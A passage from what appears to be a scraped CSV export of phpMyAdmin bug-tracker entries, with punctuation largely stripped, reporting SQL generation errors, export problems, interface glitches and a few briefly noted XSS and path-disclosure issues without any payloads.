W Original URL https sourceforge.net p phpmyadmin bugs 2579 https sourceforge.net p phpmyadmin bugs 2579 Original author masterwiz Found in version 2.11.1","bug"
"24444","8944","Exporting and functions.
Missing DELIMITER generation.
Original URL https sourceforge.net p phpmyadmin bugs 2580 https sourceforge.net p phpmyadmin bugs 2580 Original author lem9 Found in version 2.11.2","bug"
"24444","8945","unable to add user to mysql < 4.1. phpmyadmin 2.11.2 MySQL 3.23.58 PHP 4.4.7 When attempting to add a MySQL user privilege on the latest version it fails, PHPMyAdmin 2.11.1 works fine as it appears to use a different syntax without utf8 which 3.23 doesn t support).
Perhaps an IF mysql version lt;4.0 condition is required here?
error SQL query SELECT foo FROM `mysql`.`user` WHERE CONVERT `User` USING utf8 ) COLLATE utf8 bin = CONVERT testuser USING utf8 ) COLLATE utf8 bin AND CONVERT `Host` USING utf8 ) COLLATE utf8 bin = CONVERT USING utf8 ) COLLATE utf8 bin; MySQL said 1064 You have an error in your SQL syntax near `User` USING utf8) COLLATE utf8 bin = CONVERT testuser USING utf8) COLLATE utf8 at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2581 https sourceforge.net p phpmyadmin bugs 2581 Original author aljo Found in version 2.11.2","bug"
"24444","8946","Problems with yaml text export.
First, multiline text export outdents, rather than indents, successive lines.
Second, text that includes special yaml characters, such as , must be done via quoting or using the | indicator.
Original URL https sourceforge.net p phpmyadmin bugs 2582 https sourceforge.net p phpmyadmin bugs 2582 Original author msnomer","bug"
"24444","8947","No weird characters in generated password.
Hi, phpMyAdmin generates passwords with weird characters like dots and dollar signs.
Could you restrict the characters to just letters and numbers?
Otherwise editors and viewers regard the password as multiple words and things like double click no longer work.
Original URL https sourceforge.net p phpmyadmin bugs 2583 https sourceforge.net p phpmyadmin bugs 2583 Original author olafvdspek Found in version 3.5.1","bug"
"24444","8948","Conflict between PHP myadmin and mysqladministratot.
i m having a problem that is, if i back up the mysql database with phpMyadmin 2.11.2 its not compatible with Mysql administrator please solve it out Original URL https sourceforge.net p phpmyadmin bugs 2584 https sourceforge.net p phpmyadmin bugs 2584 Original author mayoosuf Found in version 2.11.1.2","bug"
"24444","8949","Can t set fulltext index on char column.
Hi, The T button is disabled for char columns, so you can t set a fulltext index on such columns.
Original URL https sourceforge.net p phpmyadmin bugs 2585 https sourceforge.net p phpmyadmin bugs 2585 Original author olafvdspek","bug"
"24444","8950","XSS on database names.
See our security advisory PMASA 2007 7 on phpmyadmin.net.
Original URL https sourceforge.net p phpmyadmin bugs 2586 https sourceforge.net p phpmyadmin bugs 2586 Original author lem9 Found in version 2.11.2","bug"
"24444","8951","Copy table fails unknown character set.
Copy table fails unknown character set .
There appears to be a space missing between the default character set and the ROW FORMAT command.
CREATE TABLE `mydb`.`xyz` `ID` int 11 ) NOT NULL AUTO INCREMENT , `name` varchar 50 ) CHARACTER SET utf8 COLLATE utf8 unicode ci NOT NULL , `language` char 2 ) CHARACTER SET utf8 COLLATE utf8 unicode ci NOT NULL , `help text` text CHARACTER SET utf8 COLLATE utf8 unicode ci NOT NULL , PRIMARY KEY `ID` ) ) ENGINE = MYISAM DEFAULT CHARSET = utf8ROW FORMAT = DYNAMIC MySQL said 1115 Unknown character set utf8ROW FORMAT The settings are phpMyAdmin 2.11.2.1 Server version 5.0.22 community nt MySQL charset UTF 8 Unicode utf8) MySQL connection collation utf8 unicode ci MySQL client version 5.0.22 Original URL https sourceforge.net p phpmyadmin bugs 2587 https sourceforge.net p phpmyadmin bugs 2587 Original author k1ngrs Found in version 2.11.2.1","bug"
"24444","8952","CREATE TABLE with multi PKs autoincrement.
OS XP Web server IIS 5.1 PHP 5.2.0 en cgi php.exe) MySQL server 4.1.22 community nt MySQL client 4.1.7 Browser Firefox 2.0.0.9 phpmyadmin 2.11.0 ok sorry I say always tomorrow) Using gui interface of phpmyadmin I try to create a table with 3 first fields in primary key.
The third one is INT unsigned autoincremented.
The generated SQL source is wrong and I got en error.
The generated SQL source is CREATE TABLE `bdp ally`.`attaques` `attaquant` VARCHAR 24 ) NOT NULL , `cible` VARCHAR 24 ) NOT NULL , `num` INT 11 ) UNSIGNED NOT NULL AUTO INCREMENT PRIMARY KEY, `date heure` DATETIME NOT NULL , `type` ENUM duel , brulot , port ) NOT NULL , `resultat` ENUM reussite , echec , nul ) NOT NULL , `degats id` INT 11 ) NULL , `attaq ally` VARCHAR 24 ) NULL , `cible ally` VARCHAR 24 ) NULL , PRIMARY KEY `attaquant` , `cible` ) ) ENGINE = MYISAM CHARACTER SET latin1 COLLATE latin1 general cs The autoincrement directive take precedence or is independent of the processing of the primary key fields list.
This is wrong and the correct code should be CREATE TABLE `bdp ally`.`attaques` `attaquant` VARCHAR 24 ) NOT NULL , `cible` VARCHAR 24 ) NOT NULL , `num` INT 11 ) UNSIGNED NOT NULL AUTO INCREMENT , `date heure` DATETIME NOT NULL , `type` ENUM duel , brulot , port ) NOT NULL , `resultat` ENUM reussite , echec , nul ) NOT NULL , `degats id` INT 11 ) NULL , `attaq ally` VARCHAR 24 ) NULL , `cible ally` VARCHAR 24 ) NULL , PRIMARY KEY `attaquant` , `cible` , `num` ) ) ENGINE = MYISAM CHARACTER SET latin1 COLLATE latin1 general cs Original URL https sourceforge.net p phpmyadmin bugs 2588 https sourceforge.net p phpmyadmin bugs 2588 Original author edurup","bug"
"24444","8953","BIG bug with repairing a broken table.
HI, This was the first instance that I had a broken table.
There was a power cut...rebooted and one of the tables in the database had broken.
I was running a program at the time.
Anyhow, I went to phpmyadmin and opened the table, then went to operations then pressed check table this threw an error report saying the table was broken.
I then tried to go back to operations, but where the check table and repaid table links should be was an error report.
There was no link for me to repair the table that was broken I was unable to repair the table through the phpmyadmin interface and had to do so through running a small php script.
don t know if this is fixed in newer versions.
thanks Original URL https sourceforge.net p phpmyadmin bugs 2589 https sourceforge.net p phpmyadmin bugs 2589 Original author gandalf12 Found in version 2.8.1","bug"
"24444","8954","mysql DBI does not handle when control user connection fails.
Just noticed this on demo server when control user account is broken and using mysql extension, I get this Notice in .
libraries database interface.lib.php 1041 Undefined index userlink Backtrace .
libraries header scripts.inc.php 39 PMA isSuperuser ) .
libraries header.inc.php 28 require once .
libraries header scripts.inc.php) .
libraries common.lib.php 514 require once .
libraries header.inc.php) .
libraries database interface.lib.php 85 PMA mysqlDie string 1045 Access denied for user pma localhost using password YES), string SET NAMES utf8;, ) .
libraries database interface.lib.php 712 PMA DBI query string SET NAMES utf8;, boolean , integer 1, ) .
libraries dbi mysql.dbi.lib.php 87 PMA DBI postConnect boolean , boolean 1, ) .
libraries common.inc.php 865 PMA DBI connect string pma, string XXXXX, boolean 1, ) .
index.php 34 require once .
libraries common.inc.php) Original URL https sourceforge.net p phpmyadmin bugs 2590 https sourceforge.net p phpmyadmin bugs 2590 Original author nijel","bug"
"24444","8955","Confusing messages when both connections fail.
When both connections config based and control user) fail, user gets three completely different messages.
One for failing configuration, then MySQL error for failing configuration and then one formatted for failing control user.
I think all these two errors should be formatted in a similar way.
Attaching screenshot for example.
Original URL https sourceforge.net p phpmyadmin bugs 2591 https sourceforge.net p phpmyadmin bugs 2591 Original author nijel Found in version Latest Git","bug"
"24444","8956","Login doesn t work on nginx.
When running phpmyadmin at http domain.com phpmyadmin Login redirects to http domain.com.
index.php?lang=en utf 8 token= lt;snip gt; Which doesn t exist.
I suspect that it was meant to redirect to .
index.php, meaning index.php in the current directory, but this doesn t work on the latest stable version of nginx 0.5.33) The link should be made relative like other phpmyadmin links, which work just fine.
Original URL https sourceforge.net p phpmyadmin bugs 2592 https sourceforge.net p phpmyadmin bugs 2592 Original author eloff Found in version 2.11.2.1","bug"
"24444","8957","Referential check breaks page look.
Referential integrity check block on operations page still uses old list layout while all other elements are using fieldsets.
It makes the referential check links look really misplaced.
Right now it can be seen here, but I m not sure if it will last http pma.cihar.com trunk config tbl operations.php?db=phpmyadmin table=pma table coords Original URL https sourceforge.net p phpmyadmin bugs 2593 https sourceforge.net p phpmyadmin bugs 2593 Original author nijel Found in version Latest Git","bug"
"24444","8958","XSS on login page.
In libraries auth cookie.auth.lib.php, the value of GLOBALS[ convcharset ] is not sanitized.
Original URL https sourceforge.net p phpmyadmin bugs 2594 https sourceforge.net p phpmyadmin bugs 2594 Original author lem9","bug"
"24444","8959","wrong escaping when using double quotes.
Example Query UPDATE `help` SET `text` = lt;p gt; Das Passwort und weitere Einstellungen kxc3xb6nnen im lt;a href= \{base url\} profile gt;Profil lt; a gt; gexc3xa4ndert werden.
lt; p gt; WHERE `id` = 1; The attached screenshot should show the problem very well.
Chris Original URL https sourceforge.net p phpmyadmin bugs 2595 https sourceforge.net p phpmyadmin bugs 2595 Original author phpmyforum Found in version 2.11.2.2","bug"
"24444","8960","Back link after a SQL error forgets the query.
Using svn revision 10937.
2.11.3 dev) Step by step Navigate to the stage where you have the database structure the list with the tables) in the main frame.
Click on the SQL link in the toolbar .
In the Run SQL query queries on database XXXXX text area type a query that will generate an error.
Press Go button to submit.
When the Error screen appears press the Back link at its bottom.
Expected result the text area with the sql query as typed) to be displayed, so the user can correct and re run it.
Actual result the database structure frame is displayed.
The sql query text is lost .
The expected behavior happens if a table is selected first.
Searched in the bugs list by summary sql error back) OR details sql error back) OR all comments sql error back)) AND group artifact id 377408) no recent relevant entries found by me.
Original URL https sourceforge.net p phpmyadmin bugs 2596 https sourceforge.net p phpmyadmin bugs 2596 Original author gtalev Found in version 2.11.2.2","bug"
"24444","8961","Query editor removes signs.
MYSql 4.1.22 Query editor in separate browser window loses plus characters when it is returned to by edit button Scenario 1.press SQL tab in editor window type select 1 1 Press Go 2.Query text is displayed with several buttons underneath and then Query results.
3.Press edit button under query text ie.
under select 1 1 4\.
editor is opened in New browser window.
text in window is select 1 1 when it should be; select 1 1 it doesn t matter how many plusses all are removed under this scenario.
Luke BTW the workaround is to select the separate editor window without pressing the Edit Button Original URL https sourceforge.net p phpmyadmin bugs 2597 https sourceforge.net p phpmyadmin bugs 2597 Original author lweerts Found in version 2.10.0.2","bug"
"24444","8962","JS dependency in Export Table?.
Hi, The Export Table page looks weird when JS has been disabled.
It looks like lots of extra options are shown.
Is JS required?
Original URL https sourceforge.net p phpmyadmin bugs 2598 https sourceforge.net p phpmyadmin bugs 2598 Original author olafvdspek","bug"
"24444","8963","Fatal error PMA sendHeaderLocation IE6).
When editing a result that returns exactly 1 row in PMA with a WHERE clause using a single column.
If an update is made to that column that was used in the where clause and Go is pressed to update the row), updates to the row do happen, but it generates the following error and does not return to the row view.
0 PMA sendHeaderLocation url) called at dir sql.php 630] 1 require dir sql.php) called at dir tbl replace.php 372] Fatal error PMA sendHeaderLocation called when headers are already sent!
in dir libraries common.lib.php on line 705 Original URL https sourceforge.net p phpmyadmin bugs 2599 https sourceforge.net p phpmyadmin bugs 2599 Original author s kirk Found in version 2.11.2.2","bug"
"24444","8964","DROP PROCEDURE doesn t show alert.
This is on 2.11.3 rc1 CREATE TABLE `TEST` `ID` int 10) unsigned NOT NULL default 0 , PRIMARY KEY `ID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `TEST` VALUES 1); INSERT INTO `TEST` VALUES 2); CREATE PROCEDURE simpletest ) SELECT COUNT ) FROM TEST; DROP PROCEDURE simpletest; The DROP PROCEDURE command doesn t show an alerts asking whether I want to do this or not, which it should.
Original URL https sourceforge.net p phpmyadmin bugs 2601 https sourceforge.net p phpmyadmin bugs 2601 Original author warforge00 Found in version 2.11.2","bug"
"24444","8965","Space issue with DROP DELETE ALTER TABLE.
This is actually on 2.11.3 rc1 Create a temporary table called TEST CREATE TABLE `TEST` `ID` int 10) unsigned NOT NULL default 0 , PRIMARY KEY `ID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; If I do DROP TABLE `TEST` , I get an alert asking if I really want to do this.
If I do DROP TABLE `TEST` , I don t get any alert message and the table is dropped.
Original URL https sourceforge.net p phpmyadmin bugs 2600 https sourceforge.net p phpmyadmin bugs 2600 Original author warforge00 Found in version 2.11.3","bug"
"24444","8966","Page count of results wrong if LIMIT used in QUERY.
If you use the LIMIT statement in an SQL Query, e.g.
a saved query or in the textbox of the SQL Tab, the result page shows some wrong informations.
If you for example enter the query SELECT FROM table LIMIT 0, 100 The results shown and also the number of results shown is correct.
100 rows show up, but in the info of the top it still says Displaying results 0 29... and if for example the table really had 150 rows it should say that there are two result pages available, but it says 5 150 30).
The go to next page buttons also all don t work...
I found this problem in version 2.11.0 and can still be found on the current release 2.11.3 RC1 Original URL https sourceforge.net p phpmyadmin bugs 2603 https sourceforge.net p phpmyadmin bugs 2603 Original author mswiege Found in version 2.11.2.2","bug"
"24444","8967","Fatal error reveals the absolute path.
from the irc channel rsc n=robert fedora rsc) has joined phpmyadmin lt;rsc gt; btw, why is CVE 2007 0095 not fixed since 2.9.1.1?
lt;rsc gt; http pma.cihar.com themes darkblue orange layout.inc.php lt; CVE 2007 0095 is still unfixed.
Robert seems to be the Fedora phpMyAdmin maintainer) see http cve.mitre.org cgi bin cvename.cgi?name=CVE 2007 0095 result when called directly Fatal error Call to a member function getImgPath ) on a non object in C \PMA\QA211\themes\darkblue orange\layout.inc.php on line 75 also confirmed on the demo server) my suggested simple fix for themes darkblue orange layout.inc.php lt;?php or after the header comment if empty SESSION[ PMA Theme ])) \{ exit; \} just my .02 xe2x82xac Jxc3xbcrgen Original URL https sourceforge.net p phpmyadmin bugs 2604 https sourceforge.net p phpmyadmin bugs 2604 Original author windkiel Found in version 2.11.3","bug"
"24444","8968","translators.html still uses iso 8859 1. translators.html still uses content= text html charset=iso 8859 1 in contrast to http wiki.cihar.com pma Devel phpMyAdmin 3 Code design ) Original URL https sourceforge.net p phpmyadmin bugs 2602 https sourceforge.net p phpmyadmin bugs 2602 Original author windkiel Found in version Latest Git","bug"
"24444","8969","export trigger should use DROP TRIGGER IF EXISTS.
A table that contains triggers will always export the triggers w a preceding DROP TRIGGER statement.
Instead, it should export a DROP TRIGGER IF EXISTS statement.
Original URL https sourceforge.net p phpmyadmin bugs 2605 https sourceforge.net p phpmyadmin bugs 2605 Original author mechamecha Found in version 2.11.1","bug"
"24444","8970","Optional disable use of slow) INFORMATION SCHEMA.
See http sourceforge.net forum forum.php?thread id=1889931 forum id=72909 Original URL https sourceforge.net p phpmyadmin bugs 2606 https sourceforge.net p phpmyadmin bugs 2606 Original author lem9 Found in version 3.5.6","bug"
"24444","8971","Division by zero in phpmyadmin libraries common.lib.php.
There are three errors in the db structure view Warning Division by zero in phpmyadmin libraries common.lib.php on line 2171 [[ here goes page selector ]] Warning Division by zero in phpmyadmin libraries common.lib.php on line 2172 gt; Warning Division by zero in phpmyadmin libraries common.lib.php on line 2191 PMA version 2.11.1.2 php version 5.2.5 with suhosin patch 0.9.22).
Original URL https sourceforge.net p phpmyadmin bugs 2607 https sourceforge.net p phpmyadmin bugs 2607 Original author farcaller","bug"
"24444","8972","Sorting forgets an explicit LIMIT.
The generated queries called from the Sort by key dialog and from a click on the column headers do not obey an explicit LIMIT in the original query.
Original URL https sourceforge.net p phpmyadmin bugs 2608 https sourceforge.net p phpmyadmin bugs 2608 Original author lem9 Found in version 2.11.3","bug"
"24444","8973","cial links getting a ?phpMyAdmin= 45678fgh... postfix.
I am using phpMyAdmin 2.8.2.4 MySQL client version 4.1.12 Used PHP extensions mysql MySQL 5.0.46 Protocol version 10 Server Localhost via UNIX socket MySQL Karakterset UTF 8 Unicode utf8) MySQL verbindingscollatie armscii8 binarmscii8 general ciascii binascii general cibig5 binbig5 chinese cibinarycp1250 bincp1250 croatian cicp1250 czech cscp1250 general cicp1251 bincp1251 bulgarian cicp1251 general cicp1251 general cscp1251 ukrainian cicp1256 bincp1256 general cicp1257 bincp1257 general cicp1257 lithuanian cicp850 bincp850 general cicp852 bincp852 general cicp866 bincp866 general cicp932 bincp932 japanese cidec8 bindec8 swedish cieucjpms bineucjpms japanese cieuckr bineuckr korean cigb2312 bingb2312 chinese cigbk bingbk chinese cigeostd8 bingeostd8 general cigreek bingreek general cihebrew binhebrew general cihp8 binhp8 english cikeybcs2 binkeybcs2 general cikoi8r binkoi8r general cikoi8u binkoi8u general cilatin1 binlatin1 danish cilatin1 general cilatin1 general cslatin1 german1 cilatin1 german2 cilatin1 spanish cilatin1 swedish cilatin2 binlatin2 croatian cilatin2 czech cslatin2 general cilatin2 hungarian cilatin5 binlatin5 turkish cilatin7 binlatin7 estonian cslatin7 general cilatin7 general csmacce binmacce general cimacroman binmacroman general cisjis binsjis japanese ciswe7 binswe7 swedish citis620 bintis620 thai ciucs2 binucs2 czech ciucs2 danish ciucs2 esperanto ciucs2 estonian ciucs2 general ciucs2 hungarian ciucs2 icelandic ciucs2 latvian ciucs2 lithuanian ciucs2 persian ciucs2 polish ciucs2 roman ciucs2 romanian ciucs2 slovak ciucs2 slovenian ciucs2 spanish2 ciucs2 spanish ciucs2 swedish ciucs2 turkish ciucs2 unicode ciujis binujis japanese ciutf8 binutf8 czech ciutf8 danish ciutf8 esperanto ciutf8 estonian ciutf8 general ciutf8 hungarian ciutf8 icelandic ciutf8 latvian ciutf8 lithuanian ciutf8 persian ciutf8 polish ciutf8 roman ciutf8 romanian ciutf8 slovak ciutf8 slovenian ciutf8 spanish2 ciutf8 spanish ciutf8 swedish ciutf8 turkish ciutf8 unicode ci php 5.1.6 3.el4s1.7 when I do an export of the db all internal links like this lt;a href= [ 1 ] ... gt; becomes this lt;a href= [ 1 ]?phpMyAdmin=LtsNms3Yvlnk6JRBjMLAoPd8Yh3 ... gt; that number is for all the links the same but changes on every export) the same happens to files lt;a href= assets files Leaflet AGF17 12 07.pdf?phpMyAdmin=LtsNms3Yvlnk6JRBjMLAoPd8Yh3 and in php snippets ptarr[] = lt;a class= B currentCrumb href= [ .
modx ?phpMyAdmin=LtsNms3Yvlnk6JRBjMLAoPd8Yh3 gt;documentIdentifier. ]
title= .
descriptionToUse.
gt; .
titleToShow.
lt; a gt; ;\n external links like lt;a href= http www.phpMyAdmin.org do not have this problem.
Original URL https sourceforge.net p phpmyadmin bugs 2609 https sourceforge.net p phpmyadmin bugs 2609 Original author dimmy02 Found in version 2.8.2.4","bug"
"24444","8974","html font size set twice.
themes original css theme xxx.css.php revision 11014, Thu Dec 20 11 30 32 2007 UTC general tags 18 html \{ 19 font size lt;?php echo SESSION[ PMA Config ] gt;get fontsize ); ?
gt;; 20 \} 21 22 input, select, textarea \{ 23 font size 1em; 24 \} these is already set in phpmyadmin.css.php Original URL https sourceforge.net p phpmyadmin bugs 2610 https sourceforge.net p phpmyadmin bugs 2610 Original author windkiel Found in version Latest Git","bug"
"24444","8975","Operations and many databases.
With thousands of databases, the Operations page for one table loads very slowly because drop downs for all possible databases are generated.
In this case we should forget these drop downs and show a simple text field for db name.
Original URL https sourceforge.net p phpmyadmin bugs 2611 https sourceforge.net p phpmyadmin bugs 2611 Original author lem9 Found in version 2.11.3","bug"
"24444","8976","Export of query results LIMIT and CONCAT WS )).
Howdy, Summary CSV SQL exports of query results with CONCAT ) and LIMIT set fail.
Running MySQL 5.0.22, Linux FC6, using FF2.0 as browser.
Ran a rather helpful query SELECT CONCAT WS , http www.google.com search?q= , foo , bar ) FROM table a It worked perfectly when viewing results in phpmyadmin.
When I added LIMIT 20 or LIMIT 0,20 for test pre viewing purposes for the bash scripts that are gonna use it and tried to export Query results operations gt;Export ) as CSV or SQL as file or direct display, i got the error seen in attached sql error .
The CSV error is the HTML portion of the sql error message.
The most salient error line I could make out was is lt;code gt; 1305 FUNCTION contacts.CONCAT WS does not exist lt; code gt; lt;br gt; OR lt;code gt; 1305 FUNCTION contacts.CONCAT does not exist lt; code gt; lt;br gt; Seems, phpMyAdmin is sticking when a LIMIT is included in query, because when I remove limits and export query form shows Dump of all records in record count), then it works as expected.
Very, very reproducible.
LIMIT error reproduces when URL is escaped or unescaped.
LIMIT error reproduces with concat ws ) and concat ).
I usually export queries without LIMITs so don t know if this phenomena is related to concat or not, althought above error messages are again somewhat indicative.
Regards, oh4real Original URL https sourceforge.net p phpmyadmin bugs 2612 https sourceforge.net p phpmyadmin bugs 2612 Original author oh4real Found in version 2.11.3","bug"
"24444","8977","SQL History.
It would be nice when I click on a link in the SQL history tab to put the statement in the SQL tab as well as running the statement like it does.
The reason being is when it runs the statement, I only get the Refresh option and not the Edit, Explain SQL, Create PHP Code, and Refresh options...giving me no way to view or edit the code ran since it gets cut off.
SQL history link [`ecomm`.`PriceDistributor`] SELECT [...] 1 24 00 OR MC.LastUpdate gt; 2007 12 31 11 24 00 ) SQL query SELECT P.DistributorPartNumber, P.VendorPartNumber, P.SKUStatus FROM PriceDistributor P LEFT JOIN MasterVendorDef MVD ON MVD.VendorNumber = P.VendorNumber LEFT JOIN MasterVendor MV ON MV.VendorID = MVD.VendorID LEFT JOIN MasterCategoryDef MCD ON MCD.CategoryNumber = P.CategoryNumber LEFT JOIN MasterCategory MC ON MC.CategoryID = MCD.CategoryID WHERE MVD.DistributorID = 1 AND MCD.DistributorID = 1 AND MC.isActive = 1 AND [...] SQL tab SELECT FROM `PriceDistributor` WHERE 1 Original URL https sourceforge.net p phpmyadmin bugs 2613 https sourceforge.net p phpmyadmin bugs 2613 Original author warforge00 Found in version 2.11.3","bug"
"24444","8978","Invalid autogenerated SQL code for delete with table alias.
When you do a query against a table setting it with an alias, and then click on the delete button, the confirm box displays an incorrect SQL sentence which will fail to delete the row.
The reason is that it will preserve the name of the columns as alias.column, but will use just the table name in the from clause, giving a table not found error.
I attach a screen where youcan see the SQL query I performed and the query with which phpMyAdmin attempts to delete a row.
Original URL https sourceforge.net p phpmyadmin bugs 2614 https sourceforge.net p phpmyadmin bugs 2614 Original author juansotuyo Found in version 2.10.3","bug"
"24444","8979","Warn about rename deleting database.
This was supposedly fixed in PhpMyAdmin 2.11.
See bug 1755339.
It says now Command INSERT INTO ...
SELECT) But, it does not warn or confirm that the DB will be deleted.
I accidentally selected rename when I wanted to copy the database.
A popup confirmation like that which happens when you drop a database should be implemented for this.
Thanks, Micah P.S.
I love this app.
Original URL https sourceforge.net p phpmyadmin bugs 2615 https sourceforge.net p phpmyadmin bugs 2615 Original author micah gersten","bug"
"24444","8980","wrong error msg no edit Suhosin).
pma 2.11.3 and pma 3.0 verified on the demo server) when I check some rows and click on with selected edit pencil) I get a No rows selected error.
works when the table has a PI) Original URL https sourceforge.net p phpmyadmin bugs 2616 https sourceforge.net p phpmyadmin bugs 2616 Original author windkiel Found in version 2.11.4","bug"
"24444","8981","Oddity copying a table.
Using the two tables below CREATE TABLE `NewProductDef` `ProductID` int 10) unsigned NOT NULL, `MasterVendorID` int 10) unsigned NOT NULL, `VendorName` varchar 100) NOT NULL, `MasterCategoryID` int 10) unsigned NOT NULL, `CategoryName` varchar 100) NOT NULL, `CategoryDesc` varchar 200) NOT NULL, `Description` varchar 255) NOT NULL, `SKUStatus` char 1) NOT NULL, `LastUpdate` datetime NOT NULL, PRIMARY KEY `ProductID`), KEY `MasterVendorID` `MasterVendorID`), KEY `MasterCategoryID` `MasterCategoryID`), KEY `SKUStatus` `SKUStatus`), KEY `LastUpdate` `LastUpdate`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; CREATE TABLE `NewProductSummaryDef` `DefinitionID` bigint 20) unsigned NOT NULL auto increment, `ProductID` int 10) unsigned NOT NULL, `DistributorID` int 10) unsigned NOT NULL, `DistributorPartNumber` varchar 40) NOT NULL, `VendorPartNumber` varchar 40) NOT NULL, `StrippedVendorPartNumber` varchar 40) NOT NULL, `SKUStatus` char 1) NOT NULL, `LastUpdate` datetime NOT NULL, PRIMARY KEY `DefinitionID`), UNIQUE KEY `DistributorIDPartStatus` `DistributorID`,`DistributorPartNumber`,`SKUStatus`), KEY `DistributorPartNumber` `DistributorPartNumber`), KEY `VendorPartNumber` `VendorPartNumber`), KEY `ProductID` `ProductID`), KEY `StrippedVendorPartNumber` `StrippedVendorPartNumber`), KEY `SKUStatus` `SKUStatus`), KEY `LastUpdate` `LastUpdate`), KEY `PSKU` `ProductID`,`SKUStatus`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; If I copy the table `NewProductDef` to `ProductDef` under the operations tab I get the SQL query results screen with the full create table and insert statements as well as the Edit and Create PHP Code buttons.
If I do a copy on the table `NewProductSummaryDef` to `ProductSummaryDef` under the operations tab I get the SQL query results screen with the create table statement dotted [...] and the buttons are missing.
Original URL https sourceforge.net p phpmyadmin bugs 2617 https sourceforge.net p phpmyadmin bugs 2617 Original author warforge00 Found in version 2.11.4","bug"
"24444","8982","Lick of memory.
I can see the lick of memory on FreeBSD.
My configuration FreeBSD 6.2 RELEASE phpinfo ) PHP Version = gt; 5.2.5 Configure Command = gt; .
configure with apxs with openssl with zlib enable ftp with gd= usr local with jpeg dir= usr local lib with png dir= usr local lib with freetype dir= usr local lib with mcrypt= usr local lib with mysql enable mbstring MySQL5 Original URL https sourceforge.net p phpmyadmin bugs 2618 https sourceforge.net p phpmyadmin bugs 2618 Original author mr lukes Found in version 2.11.3","bug"
"24444","8983","Processes tab and refresh link.
The Processes tab and the refresh link on the Processes page produce different results.
Pages should be the same but they aren t. The pages are visibly different.
Processes tab uses server processlist.php and the refresh link uses import.php with a query containing SHOW PROCESSLIST.
Original URL https sourceforge.net p phpmyadmin bugs 2619 https sourceforge.net p phpmyadmin bugs 2619 Original author warforge00 Found in version 2.11.3","bug"
"24444","8984","Theme does not switch to darkblue orange.
The detection logic does not find a change when changing from original to darkblue orange.
Original URL https sourceforge.net p phpmyadmin bugs 2620 https sourceforge.net p phpmyadmin bugs 2620 Original author lem9 Found in version 2.11.3","bug"
"24444","8985","Incorrect sorting with AS.
CREATE TABLE `table1` `ID` varchar 40) NOT NULL, `DistributorPartNumber` varchar 40) NOT NULL, `DistributorID` varchar 10) NOT NULL, PRIMARY KEY `ID`,`DistributorPartNumber`,`DistributorID`), UNIQUE KEY `DistributorPartNumberID` `DistributorPartNumber`,`DistributorID`), KEY `DistributorID` `DistributorID`), KEY `DistributorPartNumber` `DistributorPartNumber`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `table1` VALUES 1 , 123456 , C00040 ); INSERT INTO `table1` VALUES 2 , 123457 , C00040 ); INSERT INTO `table1` VALUES 3 , 123458 , C00040 ); CREATE TABLE `table2` `DefinitionID` bigint 20) unsigned NOT NULL auto increment, `ProductID` int 10) unsigned NOT NULL, `ID` varchar 40) NOT NULL, `DistributorPartNumber` varchar 40) NOT NULL, `DistributorID` varchar 10) NOT NULL, PRIMARY KEY `DefinitionID`), UNIQUE KEY `DistributorPartNumberID` `DistributorPartNumber`,`DistributorID`), KEY `ProductID` `ProductID`), KEY `ID` `ID`), KEY `DistributorID` `DistributorID`), KEY `DistributorPartNumber` `DistributorPartNumber`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=3 ; INSERT INTO `table2` VALUES 1, 1, 123456 , 1 , 1 ); INSERT INTO `table2` VALUES 2, 2, 123458 , 2 , 1 ); Using the above tables and data, run the following SQL statement.
SELECT t2.DefinitionID, t2.ID AS PID, t1.ID AS MID FROM table2 t2 LEFT JOIN table1 t1 ON t2.DistributorPartNumber = t1.DistributorPartNumber AND t1.DistributorID = C00040 WHERE t2.DistributorID =1 This statement will execute correctly returning 2 rows.
If you click to sort by PID , you get an error saying 1054 Unknown column t2.PID in order clause , which is invalid.
The correct sorting should be ORDER BY PID or ORDER BY t2.ID Original URL https sourceforge.net p phpmyadmin bugs 2621 https sourceforge.net p phpmyadmin bugs 2621 Original author warforge00 Found in version 2.11.4","bug"
"24444","8986","Trigger Export Order.
When importing a database with triggers, CREATE TRIGGER is producing Table Does Not Exist errors when the trigger references a table not yet imported.
Hold all CREATE TRIGGER statements until all tables are imported?
Original URL https sourceforge.net p phpmyadmin bugs 2622 https sourceforge.net p phpmyadmin bugs 2622 Original author guyinva Found in version 2.11.3","bug"
"24444","8987","import Undefined variable first sql delimiter.
When importing an SQL file php gives the following warning Notice Undefined variable first sql delimiter in ... libraries import sql.php on line 170 Hint The variable is unset in line 126 an never set again till the use in line 170 Original URL https sourceforge.net p phpmyadmin bugs 2623 https sourceforge.net p phpmyadmin bugs 2623 Original author nightcreature Found in version 2.11.4","bug"
"24444","8988","Empty and Navigation frame synch..
Create the following table CREATE TABLE `test` `ID` int 11) NOT NULL, PRIMARY KEY `ID`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Load 2000 records into the table with a simple PHP script for i = 1; i lt;= 2000; i ) \{ mysql query INSERT INTO test SET ID = i ); \} Once loaded, click on the `test` table name in the left frame and click the Browse tab.
Click on the gt; gt; buttons to go to the end of the records LIMIT 1900, 100).
Click on the empty button and click OK. Once you do this, click on the browse image next to the `test` table name in the left frame.
It still says LIMIT 1900, 100, but if you click the Browse tab, it says LIMIT 0, 100.
The browse image in the left frame should function the same way as the Browse tab and reset the limit.
Original URL https sourceforge.net p phpmyadmin bugs 2624 https sourceforge.net p phpmyadmin bugs 2624 Original author warforge00 Found in version 2.11.4","bug"
"24444","8989","Calender is not sync with real life.
When I have a date field to fill in, I get a calender that says 16 01 08 is on Thursday.
Well, it s on Wednesday.
Original URL https sourceforge.net p phpmyadmin bugs 2625 https sourceforge.net p phpmyadmin bugs 2625 Original author guruyaya","bug"
"24444","8990","data export to Latex and limit .
Hie, I use phpMyAdmin 2.11.4 and MySQL 5.0.45 I ve found a small in the export of small Select in Latex format.
It seems the export to Latex fabulous tool anyway!)
doesn t work either you add a limit to the query or not.
